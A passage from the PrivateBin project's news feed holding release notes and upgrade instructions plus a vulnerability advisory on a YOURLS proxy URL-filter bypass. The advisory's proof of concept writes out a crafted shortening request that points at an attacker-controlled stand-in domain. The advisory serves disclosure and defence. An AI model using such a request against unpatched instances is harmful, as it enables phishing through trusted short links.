&lt;li&gt;section &lt;code&gt;[main]&lt;/code&gt;, key &lt;code&gt;icon&lt;/code&gt;: If commented and you prefer the look of the blocky &lt;code&gt;identicon&lt;/code&gt; over triangular &lt;code&gt;jdenticon&lt;/code&gt;, uncomment the value and set it back to &lt;code&gt;identicon&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;section &lt;code&gt;[model]&lt;/code&gt;, key &lt;code&gt;class&lt;/code&gt;: If set to &lt;code&gt;privatebin_data&lt;/code&gt; replace this with &lt;code&gt;Filesystem&lt;/code&gt; and if set to &lt;code&gt;privatebin_db&lt;/code&gt; or &lt;code&gt;zerobin_db&lt;/code&gt; replace this with &lt;code&gt;Database&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you are using the &lt;code&gt;Database&lt;/code&gt; model class and your database user is not privileged to perform schema changes, you have to manually drop the &lt;code&gt;postdate&lt;/code&gt;, &lt;code&gt;opendiscussion&lt;/code&gt;, &lt;code&gt;burnafterreading&lt;/code&gt;, &lt;code&gt;attachment&lt;/code&gt; and &lt;code&gt;attachmentname&lt;/code&gt; columns of the &lt;code&gt;paste&lt;/code&gt; table and the &lt;code&gt;nickname&lt;/code&gt; column from the &lt;code&gt;comment&lt;/code&gt; table. If you are using SQLite before 3.35.0, which doesn't support dropping columns, you must initialize a new empty database file and either manually migrate the data or start from scratch.&lt;/p&gt;
&lt;p&gt;As usual, you can &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/latest"&gt;download the archive&lt;/a&gt; for a manual upgrade and can find more details in the &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/doc/Installation.md#installation"&gt;installation instructions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We also offer a &lt;a href="https://hub.docker.com/r/privatebin/nginx-fpm-alpine/"&gt;container images using the nginx web server with php-fpm&lt;/a&gt; and one using the &lt;a href="https://hub.docker.com/r/privatebin/unit-alpine/"&gt;nginx unit application server&lt;/a&gt;, that include the recommended secure setup with the non-essential files and data outside of the web servers document root.&lt;/p&gt;
&lt;p&gt;Optionally, you can use the &lt;code&gt;bin/administration&lt;/code&gt; scripts' two new features to check if any &lt;code&gt;v1&lt;/code&gt; pastes still exist on your instance using the &lt;code&gt;--statistics&lt;/code&gt; flag and then delete them using the &lt;code&gt;--delete-v1&lt;/code&gt; flag:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;$&lt;span class="w"&gt; &lt;/span&gt;bin/administration&lt;span class="w"&gt; &lt;/span&gt;--help
Usage:
&lt;span class="w"&gt;  &lt;/span&gt;administration&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;--delete&lt;span class="w"&gt; &lt;/span&gt;&amp;lt;document&lt;span class="w"&gt; &lt;/span&gt;id&amp;gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;--delete-all&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;--delete-v1&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;|&lt;/span&gt;
&lt;span class="w"&gt;                  &lt;/span&gt;--empty-dirs&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;--help&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;--list-ids&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;--purge&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;--statistics&lt;span class="o"&gt;]&lt;/span&gt;

Options:
&lt;span class="o"&gt;[&lt;/span&gt;...&lt;span class="o"&gt;]&lt;/span&gt;
&lt;span class="w"&gt;  &lt;/span&gt;--delete-v1&lt;span class="w"&gt;       &lt;/span&gt;deletes&lt;span class="w"&gt; &lt;/span&gt;all&lt;span class="w"&gt; &lt;/span&gt;unsupported&lt;span class="w"&gt; &lt;/span&gt;v1&lt;span class="w"&gt; &lt;/span&gt;documents
&lt;span class="o"&gt;[&lt;/span&gt;...&lt;span class="o"&gt;]&lt;/span&gt;
&lt;span class="w"&gt;  &lt;/span&gt;-s,&lt;span class="w"&gt; &lt;/span&gt;--statistics&lt;span class="w"&gt;  &lt;/span&gt;reads&lt;span class="w"&gt; &lt;/span&gt;all&lt;span class="w"&gt; &lt;/span&gt;stored&lt;span class="w"&gt; &lt;/span&gt;documents&lt;span class="w"&gt; &lt;/span&gt;and&lt;span class="w"&gt; &lt;/span&gt;reports&lt;span class="w"&gt; &lt;/span&gt;statistics
$&lt;span class="w"&gt; &lt;/span&gt;bin/administration&lt;span class="w"&gt; &lt;/span&gt;--statistics
&lt;span class="o"&gt;[&lt;/span&gt;...&lt;span class="w"&gt; &lt;/span&gt;check&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;for&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;lines&lt;span class="w"&gt; &lt;/span&gt;starting&lt;span class="w"&gt; &lt;/span&gt;with&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Unsupported v1 document &amp;quot;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;and&lt;span class="w"&gt; &lt;/span&gt;the&lt;span class="w"&gt; &lt;/span&gt;conclusion&lt;span class="w"&gt; &lt;/span&gt;showing&lt;span class="w"&gt; &lt;/span&gt;any&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Legacy v1&amp;quot;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;...&lt;span class="o"&gt;]&lt;/span&gt;
$&lt;span class="w"&gt; &lt;/span&gt;bin/administration&lt;span class="w"&gt; &lt;/span&gt;--delete-v1
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;h2&gt;Changes since version 1.7.8&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: Error logging in database and filesystem backend (#1554)&lt;/li&gt;
&lt;li&gt;ADDED: Statistics on v1 pastes in administration script and option to delete them&lt;/li&gt;
&lt;li&gt;CHANGED: Removed page template (#265)&lt;/li&gt;
&lt;li&gt;CHANGED: Removed support for ZeroBin &amp;amp; v1 pastes - since release 1.3 the v2 format is used (#551)&lt;/li&gt;
&lt;li&gt;CHANGED: Removed use of base64 &amp;amp; rawinflate libraries (#551)&lt;/li&gt;
&lt;li&gt;CHANGED: Removed support for &lt;code&gt;privatebin_data&lt;/code&gt;, &lt;code&gt;privatebin_db&lt;/code&gt; &amp;amp; &lt;code&gt;zerobin_db&lt;/code&gt; model class configurations, must be replaced with &lt;code&gt;Filesystem&lt;/code&gt; or &lt;code&gt;Database&lt;/code&gt; in &lt;code&gt;cfg/conf.php&lt;/code&gt;, if still present&lt;/li&gt;
&lt;li&gt;CHANGED: Removed unused columns in database schema of tables &lt;code&gt;paste&lt;/code&gt; &amp;amp; &lt;code&gt;comment&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;CHANGED: Jdenticons are now used as the default icons&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: base-x 5.0.1, bootstrap 5.3.7, jdenticon 2.0.0 &amp;amp; kjua 0.10.0&lt;/li&gt;
&lt;li&gt;CHANGED: Minimum required PHP version is 7.4, due to a change in the jdenticon library&lt;/li&gt;
&lt;li&gt;CHANGED: Set bootstrap5 template as default for PrivateBin (#1572)&lt;/li&gt;
&lt;li&gt;CHANGED: Switched from binary bytes to SI-units (#1565)&lt;/li&gt;
&lt;li&gt;CHANGED: Replaced the term "paste" with the more generic "document" (#397)&lt;/li&gt;
&lt;li&gt;FIXED: Name mismatches in attached files (#1584)&lt;/li&gt;
&lt;li&gt;FIXED: Unable to paste attachments from clipboard (#1589)&lt;/li&gt;
&lt;li&gt;FIXED: Configuration combinations test errors&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Changes since version 1.7.7&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;FIXED: Duplicate attachment for every comment (#1577)&lt;/li&gt;
&lt;li&gt;FIXED: Attachments with empty file names (#1577)&lt;/li&gt;
&lt;li&gt;FIXED: Page template scripts loading order (#1579)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Changes since version 1.7.6&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: Switching templates using the web ui (#1501)&lt;/li&gt;
&lt;li&gt;ADDED: Show file name and size on download page (#603)&lt;/li&gt;
&lt;li&gt;CHANGED: Passing large data structures by reference to reduce memory consumption (#858)&lt;/li&gt;
&lt;li&gt;CHANGED: Removed use of ctype functions and polyfill library for ctype&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: DOMpurify 3.2.6, ip-lib 1.20.0&lt;/li&gt;
&lt;li&gt;CHANGED: Support for multiple file uploads (#1060)&lt;/li&gt;
&lt;li&gt;CHANGED: Documented CSP change necessary to allow PDF attachment preview (#1552)&lt;/li&gt;
&lt;li&gt;FIXED: Hide Reply button in the discussions once clicked to avoid losing the text input (#1508)&lt;/li&gt;
&lt;li&gt;FIXED: Bump zlib library suffix, ensuring cache refresh for WASM streaming change&lt;/li&gt;
&lt;li&gt;FIXED: Handle undefined globals in file based persisted values (#1544)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Changes since version 1.7.5&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: Ability to copy the paste by clicking the copy icon button or using the keyboard shortcut ctrl+c/cmd+c (#1390 &amp;amp; #12)&lt;/li&gt;
&lt;li&gt;CHANGED: Allow toggling tab-key-support using &lt;code&gt;[Ctrl]+[m]&lt;/code&gt; or &lt;code&gt;[Esc]&lt;/code&gt; in textarea for keyboard navigation (#1386)&lt;/li&gt;
&lt;li&gt;CHANGED: Switched to WASM streaming and replace unsafe-eval with wasm-unsafe-eval CSP declaration (#1464), requires webserver to have &lt;code&gt;application/wasm&lt;/code&gt; MIME type configured.&lt;/li&gt;
&lt;li&gt;CHANGED: Replaced usage of strpos with str_starts_with &amp;amp; str_contains (#1373)&lt;/li&gt;
&lt;li&gt;CHANGED: Added polyfill libraries for ctype, str_starts_with &amp;amp; str_contains functions (#1476)&lt;/li&gt;
&lt;li&gt;CHANGED: Turned paste delete link into a button (#266)&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: DOMpurify 3.2.4, cloud-storage 1.45.0, aws-sdk-php 3.336.2&lt;/li&gt;
&lt;li&gt;CHANGED: &lt;code&gt;bootstrap5&lt;/code&gt; template UI improvements&lt;/li&gt;
&lt;li&gt;FIXED: Redirect to the home page after changing the language (#92)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Changes since version 1.7.4&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: Allow non persistent SQL connections, if configured (#1394)&lt;/li&gt;
&lt;li&gt;ADDED: Show a button (that redirects to the &lt;code&gt;basepath&lt;/code&gt; URL) inside the alert after a paste is deleted&lt;/li&gt;
&lt;li&gt;CHANGED: Tweaked page footer of the &lt;code&gt;bootstrap5&lt;/code&gt; template (#1392)&lt;/li&gt;
&lt;li&gt;CHANGED: Simpler PostgreSQL table lookup query (#1361)&lt;/li&gt;
&lt;li&gt;CHANGED: SRI hashes are now configurable, no longer hardcoded in templates (#1365)&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: DOMpurify 3.1.7, ip-lib 1.18.1, cloud-storage 1.43.0, aws-sdk-php 3.325.0&lt;/li&gt;
&lt;li&gt;FIXED: Numeric array keys being cast to integer causing failures under strict type checking (#1435)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Changes since version 1.7.3&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;CHANGED: Saving markdown pastes uses &lt;code&gt;.md&lt;/code&gt; extension instead of &lt;code&gt;.txt&lt;/code&gt; (#1293)&lt;/li&gt;
&lt;li&gt;CHANGED: Enable strict type checking in PHP (#1350)&lt;/li&gt;
&lt;li&gt;CHANGED: Various tweaks of the &lt;code&gt;bootstrap5&lt;/code&gt; template, suggested by the community&lt;/li&gt;
&lt;li&gt;FIXED: Reset password input field on creation of new paste (#1194)&lt;/li&gt;
&lt;li&gt;FIXED: Allow database schema upgrade to skip versions (#1343)&lt;/li&gt;
&lt;li&gt;FIXED: &lt;code&gt;bootstrap5&lt;/code&gt; dark mode toggle unset on dark browser preference (#1340)&lt;/li&gt;
&lt;li&gt;FIXED: Prevent bypassing YOURLS proxy URL filter, allowing to shorten non-self URLs&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Changes since version 1.7.2&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;CHANGED: Various tweaks of the &lt;code&gt;bootstrap5&lt;/code&gt; template, suggested by the community&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: DOMpurify 3.1.3&lt;/li&gt;
&lt;li&gt;FIXED: Selected expiration not being applied, when using bootstrap template (#1309)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Changes since version 1.7.1&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: Allow use of &lt;code&gt;shortenviayourls&lt;/code&gt; in query parameters (#1267)&lt;/li&gt;
&lt;li&gt;ADDED: Input sanitation to some not yet filtered query and server parameters&lt;/li&gt;
&lt;li&gt;ADDED: Optional Bootstrap CSS 5.3.3 based template, use configuration &lt;code&gt;template = "bootstrap5"&lt;/code&gt; to switch to it (#728)&lt;/li&gt;
&lt;li&gt;CHANGED: "Send" button now labeled "Create" (#946)&lt;/li&gt;
&lt;li&gt;CHANGED: Drop some PHP &amp;lt; 5.6 fallbacks, minimum version is PHP 7.3 as of release 1.6.0&lt;/li&gt;
&lt;li&gt;CHANGED: Set &lt;code&gt;lang&lt;/code&gt; cookie with lax &lt;code&gt;SameSite&lt;/code&gt; property&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: DOMpurify 3.1.2 (#1299) &amp;amp; jQuery 3.7.1&lt;/li&gt;
&lt;li&gt;CHANGED: &lt;code&gt;create&lt;/code&gt; attribute is no longer returned in API for pastes &amp;amp; can be disabled for comments using &lt;code&gt;discussiondatedisplay&lt;/code&gt; as well (#1290)&lt;/li&gt;
&lt;li&gt;FIXED: Add cache control headers also to API calls (#1263)&lt;/li&gt;
&lt;li&gt;FIXED: Shortened paste URL does not appear in email (#606)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Changes since version 1.7.0&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;FIXED: zlib 1.3.1 wasm file reference&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Help wanted &amp;amp; greatly appreciated&lt;/h2&gt;
&lt;p&gt;Apart from the large tasks that require deeper insight and time, there are also &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22"&gt;smaller issues were help is wanted&lt;/a&gt;, topics &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?utf8=%E2%9C%93&amp;amp;q=is%3Aopen+is%3Aissue+label%3A%22discuss+me%22+"&gt;open to debate&lt;/a&gt; and of course many languages that still remain to be &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Translation"&gt;translated&lt;/a&gt;. We are also still looking for additional long term maintainers among our frequent issue helpers.&lt;/p&gt;
&lt;p&gt;What can we offer you in return for your help?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We can offer you our mentorship, if this is your first time participating as a maintainer of an open source software project. We can guide you through submitting your first pull requests and work with you to ensure your change fulfils the communities quality standards, gets merged and makes it into a release.&lt;/li&gt;
&lt;li&gt;Your work gets publicly credited. This can help you build up a resume, showing off your growing skill set, in programming as well as your soft skills.&lt;/li&gt;
&lt;li&gt;PrivateBin is a smaller project. If you'd like to learn how to participate and contribute in an open source git project, this should be less overwhelming than larger projects.&lt;/li&gt;
&lt;li&gt;We do have a decent unit test code coverage, so it is an environment forgiving of mistakes. You may still introduce logical flaws or issues in new features, not yet covered in the tests, but you can rely on the tests preventing any regressions in other areas.&lt;/li&gt;
&lt;li&gt;You don't have to be proficient in multiple programming languages, there are a lot of things to improve within either the JavaScript or PHP areas that don't need you to understand the other side, beyond their shared API.&lt;/li&gt;
&lt;li&gt;It can be an opportunity to learn about continuous integration tools to automate tasks like tests, security scans, etc.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you are interested in helping with any of these points, we have prepared a &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Development"&gt;development guide&lt;/a&gt; including design goals, code structure and tools to get you started. For any questions, you can chat with the maintainers in the &lt;a href="https://github.com/PrivateBin/PrivateBin/discussions"&gt;discussion&lt;/a&gt; area or reach us via &lt;a href="mailto:support@privatebin.org"&gt;email&lt;/a&gt;.&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Vulnerability Report: Bypass of YOURLS proxy URL filter allows shortening URLs via YOURLs for other domains rather than the PrivateBin instance</title><link href="https://privatebin.info/reports/vulnerability-2024-07-09.html" rel="alternate"/><published>2024-07-09T21:00:00+02:00</published><updated>2024-07-09T21:00:00+02:00</updated><author><name>rugk</name></author><id>tag:privatebin.info,2024-07-09:/reports/vulnerability-2024-07-09.html</id><summary type="html">&lt;p&gt;A bypass of the YOURLS proxy URL filter has been mitigated in &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/tag/1.7.4"&gt;PrivateBin 1.7.4&lt;/a&gt;.&lt;/p&gt;</summary><content type="html">&lt;p&gt;In &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/CHANGELOG.md#15-2022-12-11"&gt;v1.5&lt;/a&gt; we introduced the YOURLS server-side proxy. The idea was to allow using the YOURLs URL shortener without running the YOURLs instance without authentication and/or exposing the authentication token to the public, allowing anyone to shorten any URL. With the proxy mechanism, anyone can shorten any URL pointing to the configured PrivateBin instance. The vulnerability allowed other URLs to be shortened, as long as they contain the PrivateBin instance, defeating the limit imposed by the proxy.&lt;/p&gt;
&lt;p&gt;Neither the confidentially of existing pastes on the server nor the configuration options including the YOURLs token are affected.&lt;/p&gt;
&lt;h3&gt;Impact&lt;/h3&gt;
&lt;p&gt;This issue only affects non-standard configurations of PrivateBin. Instances are affected if all of the following conditions are met:
1. The PrivateBin instance enables URL shortening.
2. A YOURLs URL shortener is used and it is configured not to be public and require authentication to shorten URLs.
3. A basepath, the YOURLs proxy mechanism and an authentication token is  configured in PrivateBin to use the non-public YOURLs instance.
4. A crafted URL is sent to PrivateBins' YOURLs proxy endpoint with a URL that contains the PrivateBin instance URL as a GET-parameter or as part of the URL-fragment, but doesn't start with the instance URL (a third-party URL)&lt;/p&gt;
&lt;p&gt;The root cause is, &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/3cba170f3255de21bbebb77f6c565519ef33e8c1/lib/YourlsProxy.php#L50-L53"&gt;that the guard clause checking whether the URL to be shortened belongs to your own PrivateBin domain only checks if the PrivateBin instance is contained in the URL&lt;/a&gt; but not if it starts with it.&lt;/p&gt;
&lt;p&gt;This is a kind of authentication bypass due to incomplete filtering. This &lt;a href="https://cwe.mitre.org/data/definitions/601.html"&gt;has a similar impact like an open redirect&lt;/a&gt; except it does not directly redirect, but allows a further hiding of the target URL as is common and known for URL shorteners. If the URL shortener domain used is trusted by it's users, this allows hiding a malicious URL.&lt;/p&gt;
&lt;p&gt;The highest impact may be that this can be used for phishing campaigns, by routing users to some kind of fake site mimicking the trusted shortener or PrivateBin domain, which could then extract sensitive data from entered data or similar. That said, this is a general concern with URL shorteners and users are advised to follow general phishing prevention attempts like verifying the domain of the site they are using and &lt;a href="https://github.com/PrivateBin/PrivateBin?tab=readme-ov-file#what-it-doesnt-provide"&gt;using a trusted PrivateBin instance&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Indicators of exploitation&lt;/h3&gt;
&lt;p&gt;Check your YOURLs proxy for shortened domains that do not start with your own PrivateBin instance. Also note, that for this to be a result of an exploitation of this vulnerability, somewhere in the URL the &lt;code&gt;base path + ?&lt;/code&gt; e.g. &lt;code&gt;https://privatebin.example/?&lt;/code&gt; has to appear in the destination URL, as this is what the guard checked for.&lt;/p&gt;
&lt;h3&gt;Patches&lt;/h3&gt;
&lt;p&gt;The problem has been patched in version 1.7.4 of PrivateBin. In addition to upgrading, users of the YOURLs proxy feature should check for the indicators of exploitation, as outlined above.&lt;/p&gt;
&lt;h3&gt;Workarounds&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Disable URL shortening, if you have been using it.&lt;/li&gt;
&lt;li&gt;Only the YOURLs proxy is affected. Other URL shortening options either require a public, un-authenticated shortener, or expose the token to the client, which by design allows shortening any URL.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Proof of concept&lt;/h3&gt;
&lt;p&gt;See &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/2c711e9d3ca21230fc68f5b4dba2a7a0592b963b/tst/YourlsProxyTest.php#L57-L62"&gt;the unit test that got introduced&lt;/a&gt; to prevent similar regressions for an example of a URL that would circumvent the configured basepath.&lt;/p&gt;
&lt;p&gt;Here is an example of how a manual exploitation would work:&lt;/p&gt;
&lt;p&gt;In a PrivateBin instance hosted on &lt;code&gt;https://privatebin.example/&lt;/code&gt;, with a valid URL YOURLs shortening proxy configuration using a token to prevent un-authenticated short-URL creation, send a URL shortening request for the domain &lt;code&gt;https://attacker.example.com/?q=https://privatebin.example/?foo#bar&lt;/code&gt;. &lt;code&gt;attacker.example.com&lt;/code&gt; is any attacker controlled, arbitrary domain.&lt;/p&gt;
&lt;p&gt;You can do this by sending a GET request to &lt;code&gt;https://privatebin.example/shortenviayourls?link=https%3A%2F%2Fattacker.example.com%2F%3Fq%3Dhttps%3A%2F%2Fprivatebin.example%2F%3Ffoo%23bar&lt;/code&gt;, without URL encoding this looks as follows: &lt;code&gt;https://privatebin.example/shortenviayourls?link=https://attacker.example.com/?q=https://privatebin.example/?foo#bar&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;On an affected setup, you will get a valid short URL, which when accessed, leads to &lt;code&gt;https://attacker.example.com/?foo#bar&lt;/code&gt;, the attackers domain. On a patched system your request will get rejected and only URLs starting with &lt;code&gt;https://privatebin.example/?[...]&lt;/code&gt; are allowed for shortening.&lt;/p&gt;
&lt;h3&gt;Post-mortem&lt;/h3&gt;
&lt;p&gt;From our limited analysis, the issue &lt;a href="https://github.com/PrivateBin/PrivateBin/commit/0dc9ab7576d5a1296debeb788afb2ae9c72d137c"&gt;has been introduced in commit &lt;code&gt;0dc9ab7&lt;/code&gt; while refactoring&lt;/a&gt;. The use of &lt;a href="http://php.net/manual/function.substr.php"&gt;&lt;code&gt;substr&lt;/code&gt;&lt;/a&gt; got replaced by &lt;a href="https://www.php.net/manual/function.strpos"&gt;&lt;code&gt;strpos&lt;/code&gt;&lt;/a&gt;. The &lt;a href="https://github.com/PrivateBin/PrivateBin/commit/b0f17f0a91cdebbfd6732781943f1e04ce3311f7"&gt;initial contribution&lt;/a&gt; contained no tests, but an implementation without this flaw. All these changes got introduced &lt;a href="https://github.com/PrivateBin/PrivateBin/pull/997"&gt;in a single pull request&lt;/a&gt;. This follows many best practices, as tests were added and the refactoring was done in close collaboration with the original author.&lt;/p&gt;
&lt;p&gt;In the future, &lt;a href="https://github.com/PrivateBin/PrivateBin/issues/1373"&gt;we plan to switch to the more obvious, readable and understandable&lt;/a&gt; &lt;a href="https://www.php.net/manual/function.str-starts-with.php"&gt;&lt;code&gt;str_starts_with&lt;/code&gt;&lt;/a&gt;, which is available since PHP v8. Such a better function naming and insisting on using modern functions would not only result in a better code quality, but would possibly have prevented the issue, but for backwards-compatibility with PHP 7.3, we stay on the old function for now.&lt;/p&gt;
&lt;h3&gt;Final Thoughts&lt;/h3&gt;
&lt;p&gt;The project maintainers have always discouraged the use of URL shorteners and &lt;strong&gt;users are always safer sharing the complete, long URL to a paste&lt;/strong&gt;, see &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/FAQ#the-url-is-so-long-cant-i-just-use-an-url-shortener"&gt;our FAQ&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you need or want to provide a URL shortener option as a PrivateBin instance administrator, YOURLs is the &lt;em&gt;best option&lt;/em&gt; available to use with PrivateBin, because it is the only shortener supported, through the proxy mechanism, preventing arbitrarily shortening any URLs. Running a public URL shortener instance and allowing anonymous users shortening arbitrary domains invites the shortener getting abused.&lt;/p&gt;
&lt;h3&gt;References&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;PR to fix the vulnerability: https://github.com/PrivateBin/PrivateBin/pull/1370&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Timeline&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;2024-06-28 Issue report by @nbxiglk via email&lt;/li&gt;
&lt;li&gt;2024-06-29 Vulnerability reproduced by @elrido, mitigation created and shared with maintainers and issue reporter for review&lt;/li&gt;
&lt;li&gt;2024-07-06 Pull request with mitigation raised&lt;/li&gt;
&lt;/ul&gt;</content><category term="Reports"/><category term="PrivateBin"/><category term="Security"/></entry><entry><title>Release v1.7.0 - Ask for confirmation, before loading burn after reading pastes</title><link href="https://privatebin.info/news/v1.7.0-release.html" rel="alternate"/><published>2024-02-11T14:52:00+01:00</published><updated>2024-02-11T14:52:00+01:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2024-02-11:/news/v1.7.0-release.html</id><summary type="html">&lt;p&gt;This release asks for confirmation, before loading burn after reading pastes.&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release asks for confirmation, before loading burn after reading pastes.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In addition the new translations for the Romanian language got added, detection for damaged pastes during purge got introduced and a few minor user interface glitches resolved.&lt;/p&gt;
&lt;h2&gt;Update procedure&lt;/h2&gt;
&lt;p&gt;As usual, you can &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/latest"&gt;download the archive&lt;/a&gt; for a manual upgrade and can find more details in the &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/doc/Installation.md#installation"&gt;installation instructions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We also offer a &lt;a href="https://hub.docker.com/r/privatebin/nginx-fpm-alpine/"&gt;container images using the nginx web server with php-fpm&lt;/a&gt; and one using the &lt;a href="https://hub.docker.com/r/privatebin/unit-alpine/"&gt;nginx unit application server&lt;/a&gt;, that include the recommended secure setup with the non-essential files and data outside of the web servers document root.&lt;/p&gt;
&lt;h2&gt;Changes since version 1.6.2&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: Translations for Romanian&lt;/li&gt;
&lt;li&gt;ADDED: Detect and report on damaged pastes (#1218)&lt;/li&gt;
&lt;li&gt;CHANGED: Ask for confirmation, before loading burn after reading pastes (#1237)&lt;/li&gt;
&lt;li&gt;CHANGED: Focus on password input in modal dialog&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: DOMpurify 3.0.8 &amp;amp; zlib 1.3.1&lt;/li&gt;
&lt;li&gt;FIXED: Support more types of valid URLs for shorteners, incl. IDN ones (#1224)&lt;/li&gt;
&lt;li&gt;FIXED: Email timezone buttons overlapping in some languages (#1039)&lt;/li&gt;
&lt;li&gt;FIXED: Changing language mangles URL (#1191)&lt;/li&gt;
&lt;li&gt;FIXED: Needless reload when visiting default URL&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Changes since version 1.6.1&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;FIXED: English not selectable when &lt;code&gt;languageselection&lt;/code&gt; enabled (#1208)&lt;/li&gt;
&lt;li&gt;FIXED: SRI mismatch due to cached file having changed (#1207)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Changes since version 1.6.0&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: Right-To-Left (RTL) support for Arabic &amp;amp; Hebrew (#1174)&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: DOMpurify 3.0.6&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Help wanted &amp;amp; greatly appreciated&lt;/h2&gt;
&lt;p&gt;Apart from the large tasks that require deeper insight and time, there are also &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22"&gt;smaller issues were help is wanted&lt;/a&gt;, topics &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?utf8=%E2%9C%93&amp;amp;q=is%3Aopen+is%3Aissue+label%3A%22discuss+me%22+"&gt;open to debate&lt;/a&gt; and of course many languages that still remain to be &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Translation"&gt;translated&lt;/a&gt;. We are also still looking for additional long term maintainers among our frequent issue helpers.&lt;/p&gt;
&lt;p&gt;What can we offer you in return for your help?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We can offer you our mentorship, if this is your first time participating as a maintainer of an open source software project. We can guide you through submitting your first pull requests and work with you to ensure your change fulfils the communities quality standards, gets merged and makes it into a release.&lt;/li&gt;
&lt;li&gt;Your work gets publicly credited. This can help you build up a resume, showing off your growing skill set, in programming as well as your soft skills.&lt;/li&gt;
&lt;li&gt;PrivateBin is a smaller project. If you'd like to learn how to participate and contribute in an open source git project, this should be less overwhelming then larger projects.&lt;/li&gt;
